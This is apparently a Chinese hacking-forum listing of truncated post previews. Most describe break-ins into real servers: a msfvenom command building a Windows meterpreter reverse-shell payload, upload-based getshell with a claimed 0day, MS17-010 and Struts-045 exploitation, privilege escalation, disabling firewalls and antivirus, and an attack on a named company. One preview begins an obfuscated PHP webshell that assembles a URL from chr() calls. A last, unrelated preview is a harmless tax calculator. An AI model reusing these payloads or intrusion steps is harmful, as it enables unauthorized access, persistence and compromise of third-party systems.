windows 2008 r2 meterpreter转发内网实例我们已经讲过了reDuh转发提权内网实例,今天带来一篇使用msf的meterpreter转发实例准备工具:frp内网穿透工具一台VPS linux主机,一台kali的系统,一台window的系统使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XX LPORT=2333 -f c生成一个shellcode,在Microsoft Visual C++进...
/
616 次浏览/
核心成员
提权小试之oday getshell 内网提权windows 2008 r2过程本次用到自己写的工具,实现一键上传并getshell通过上传返回getshell即可进入webshell,发现开放很多端口445可以用于ms17010终端3389打开发现是内网环境补丁倒是打了不少,我们试试16032提权发现,直接溢出成功了一切看起来很顺利,接下来就是内网转发了内网转发这里使用reDuh或者msf内置的meterpreter转发服务器支持aspx直接上传,然后输入命令java --...
/
636 次浏览/
核心成员
绕过管理员安全策略再次进入服务器 之前利用MSSQL提权进入了服务器,现在终端连不上,以为是终端关闭了,结果试试开启远程终端,再把防火墙关掉再次连接,成功发现用户密码错误修改下密码即可发现多了一个向日葵360...
/
431 次浏览/
核心成员
一个可以干掉360进程的提权工具https://pan.baidu.com/s/1lJqFDsCVblFemNHgy31ECAvjfk...
/
510 次浏览/
核心成员
post upload发包工具精简版没事挖了一个通用上传oday,就写了这么一个工具工具原理就是向网站发送构造的POST上传数据包,返回一个shell地址...
/
386 次浏览/
核心成员
thankphp 5.0.x getshell提权遇到一个站,感觉有漏洞正好写个测试工具...
/
737 次浏览/
核心成员
struts-045秒提windos server 2016服务器有时候只要看到.action index.action . login.action都可以试试struts遇到一台没打补丁的机器,windos server 2016直接添加管理号,进入服务器...
/
356 次浏览/
核心成员
cmdshell降权峰回路转提权window 2003服务器过程好久没写文章了,今天带来一篇cmdshell降权峰回路转提权window 2003服务器过程目标:一家江苏计算机公司架构类型:aspx初步发现有未授权访问但是上传无法返回图片地址发现有fck,无奈走一波可能有解析漏洞直接访问一切都很顺利直接getshell接下来,就是提权了额发现出问题了,asp不能创建对象,上传了一个aspx试试aspx权限应该够大,但是拒绝访问,看下可写目录直接试试传一个cmd.exe可以执行...
/
544 次浏览/
核心成员
<?php$password='xxz';//鐧诲綍瀵嗙爜//----------鏈▼搴忓畬缇庢敮鎸丳HP 4, PHP 5, PHP 7------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116).$c(112).$c(58);$url.=$c(47).$c(47)....
/
359 次浏览/
核心成员
python工资纳税程序before=float(input("请输入你的税前工资:"))m1=float(input("请输入社保扣除工资:"))ss=0ys=before-m1-5000if ys<=3000 and ys<0: ss=ys*0.03-0elif ys<=12000: ss=ys*0.1-210elif ys<=25000:  ...
/
334 次浏览/
核心成员